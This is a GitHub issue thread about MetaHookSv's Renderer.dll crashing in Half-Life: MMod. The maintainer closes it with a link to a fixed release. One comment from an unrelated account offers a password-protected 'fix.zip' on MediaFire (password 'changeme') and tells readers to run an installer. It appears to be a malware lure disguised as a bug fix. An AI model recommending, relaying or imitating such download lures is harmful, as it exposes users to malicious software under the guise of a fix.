### ISSUE TITLE
Half-Life: MMod, crash due to "GameStudioRenderer_StudioCalcAttachments_vftable_index"

### ISSUE THREAD

**Issue by Blackgrowl** [hzqst/MetaHookSv#487]
MMod causes a crash if you use "Renderer.dll" with it, the crash appears as seen in this picture:
![image](https://github.com/user-attachments/assets/a86ba70b-a514-41cc-a570-796b0128090a)

Transcripted:
[Renderer] Could not found: GameStudioRenderer_StudioCalcAttachments_vftable_index
Engine buildnum: 8684

Other than that and BulletPhysics.dll, MetaHook successfully hooks into MMod itself, which at the very least allows me to use MetaAudio.

You can get the game from here:
https://store.steampowered.com/app/1761270/HalfLife_MMod/
Please note that the one in Moddb is outdated.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hzqst** [comment]
Fixed https://github.com/hzqst/MetaHookSv/releases/tag/v20241012g
